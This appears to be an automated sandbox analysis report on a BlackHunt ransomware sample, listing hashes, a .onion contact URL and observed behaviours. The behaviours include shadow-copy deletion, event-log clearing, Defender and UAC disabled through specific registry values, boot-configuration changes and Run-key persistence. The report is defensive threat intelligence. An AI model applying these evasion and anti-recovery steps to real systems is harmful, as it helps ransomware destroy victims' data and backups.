Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:25
Static task
static1
Behavioral task
behavioral1
Sample
a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe
Resource
win10v2004-20231215-en
General
-
Target
a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe
-
Size
707KB
-
MD5
f0cdde5d3dbd39b15970de7d8b65c4d3
-
SHA1
ee7fe92c7d68b3f43f64a78cd220ca270ef2d89c
-
SHA256
a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16
-
SHA512
27978d5e010f36f1612de868ed53c4fc063aa6407b0eae2cec41569a3f219492fbe52e0d011fe6f04f95c3b1d50a2de6ac35a753d3d0a4939d7d5845fb824ccb
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1O8avnh:6uaTmkZJ+naie5OTamgEoKxLW10h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1864 fsutil.exe 960 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 612 wevtutil.exe 1612 wevtutil.exe 3364 wevtutil.exe 4056 wevtutil.exe 1252 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2820 bcdedit.exe 3292 bcdedit.exe 2656 bcdedit.exe 964 bcdedit.exe -
Renames multiple (2888) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3540 wbadmin.exe 3732 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3476 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\J: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\Q: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\I: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\G: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\Z: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\X: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\A: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\H: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\M: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\U: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\K: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\L: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\V: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\R: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\B: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\T: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\Y: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\P: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\N: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened (read-only) \??\W: a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#BlackHunt_ReadMe.hta a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_left.png a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files (x86)\Google\Update\Install\{816A3475-9C83-4071-ADF3-DF13B538F008}\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_ReadMe.hta a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\softedges.png a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\#BlackHunt_ReadMe.hta a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\#BlackHunt_ReadMe.txt a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask.wmv a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\#BlackHunt_ReadMe.hta a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#BlackHunt_ReadMe.hta a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_Private.key a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1608 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2456 vssadmin.exe 3028 vssadmin.exe 2984 vssadmin.exe 2744 vssadmin.exe 3524 vssadmin.exe 1652 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 300 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2636 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 472 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Token: SeRestorePrivilege 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Token: SeBackupPrivilege 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Token: SeTakeOwnershipPrivilege 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Token: SeAuditPrivilege 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Token: SeSecurityPrivilege 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Token: SeIncBasePriorityPrivilege 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Token: SeBackupPrivilege 1928 vssvc.exe Token: SeRestorePrivilege 1928 vssvc.exe Token: SeAuditPrivilege 1928 vssvc.exe Token: SeBackupPrivilege 3468 wbengine.exe Token: SeRestorePrivilege 3468 wbengine.exe Token: SeSecurityPrivilege 3468 wbengine.exe Token: SeSecurityPrivilege 4056 wevtutil.exe Token: SeBackupPrivilege 4056 wevtutil.exe Token: SeSecurityPrivilege 1252 wevtutil.exe Token: SeBackupPrivilege 1252 wevtutil.exe Token: SeSecurityPrivilege 3364 wevtutil.exe Token: SeBackupPrivilege 3364 wevtutil.exe Token: SeSecurityPrivilege 612 wevtutil.exe Token: SeSecurityPrivilege 1612 wevtutil.exe Token: SeBackupPrivilege 1612 wevtutil.exe Token: SeBackupPrivilege 612 wevtutil.exe Token: SeDebugPrivilege 300 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2212 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 29 PID 2148 wrote to memory of 2212 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 29 PID 2148 wrote to memory of 2212 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 29 PID 2148 wrote to memory of 2212 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 29 PID 2148 wrote to memory of 2652 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 31 PID 2148 wrote to memory of 2652 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 31 PID 2148 wrote to memory of 2652 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 31 PID 2148 wrote to memory of 2652 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 31 PID 2148 wrote to memory of 2780 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 33 PID 2148 wrote to memory of 2780 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 33 PID 2148 wrote to memory of 2780 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 33 PID 2148 wrote to memory of 2780 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 33 PID 2212 wrote to memory of 2892 2212 cmd.exe 34 PID 2212 wrote to memory of 2892 2212 cmd.exe 34 PID 2212 wrote to memory of 2892 2212 cmd.exe 34 PID 2148 wrote to memory of 2436 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 36 PID 2148 wrote to memory of 2436 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 36 PID 2148 wrote to memory of 2436 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 36 PID 2148 wrote to memory of 2436 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 36 PID 2652 wrote to memory of 2704 2652 cmd.exe 38 PID 2652 wrote to memory of 2704 2652 cmd.exe 38 PID 2652 wrote to memory of 2704 2652 cmd.exe 38 PID 2148 wrote to memory of 2756 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 39 PID 2148 wrote to memory of 2756 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 39 PID 2148 wrote to memory of 2756 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 39 PID 2148 wrote to memory of 2756 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 39 PID 2148 wrote to memory of 3056 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 41 PID 2148 wrote to memory of 3056 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 41 PID 2148 wrote to memory of 3056 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 41 PID 2148 wrote to memory of 3056 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 41 PID 2148 wrote to memory of 2684 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 43 PID 2148 wrote to memory of 2684 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 43 PID 2148 wrote to memory of 2684 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 43 PID 2148 wrote to memory of 2684 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 43 PID 2148 wrote to memory of 2700 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 44 PID 2148 wrote to memory of 2700 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 44 PID 2148 wrote to memory of 2700 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 44 PID 2148 wrote to memory of 2700 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 44 PID 2780 wrote to memory of 2864 2780 cmd.exe 46 PID 2780 wrote to memory of 2864 2780 cmd.exe 46 PID 2780 wrote to memory of 2864 2780 cmd.exe 46 PID 2756 wrote to memory of 2708 2756 cmd.exe 47 PID 2756 wrote to memory of 2708 2756 cmd.exe 47 PID 2756 wrote to memory of 2708 2756 cmd.exe 47 PID 2148 wrote to memory of 2752 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 48 PID 2148 wrote to memory of 2752 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 48 PID 2148 wrote to memory of 2752 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 48 PID 2148 wrote to memory of 2752 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 48 PID 2436 wrote to memory of 2872 2436 cmd.exe 50 PID 2436 wrote to memory of 2872 2436 cmd.exe 50 PID 2436 wrote to memory of 2872 2436 cmd.exe 50 PID 2148 wrote to memory of 2608 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 52 PID 2148 wrote to memory of 2608 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 52 PID 2148 wrote to memory of 2608 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 52 PID 2148 wrote to memory of 2608 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 52 PID 2148 wrote to memory of 2936 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 54 PID 2148 wrote to memory of 2936 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 54 PID 2148 wrote to memory of 2936 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 54 PID 2148 wrote to memory of 2936 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 54 PID 2148 wrote to memory of 2744 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 144 PID 2148 wrote to memory of 2744 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 144 PID 2148 wrote to memory of 2744 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 144 PID 2148 wrote to memory of 2744 2148 a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe 144 PID 3056 wrote to memory of 2628 3056 cmd.exe 58 -
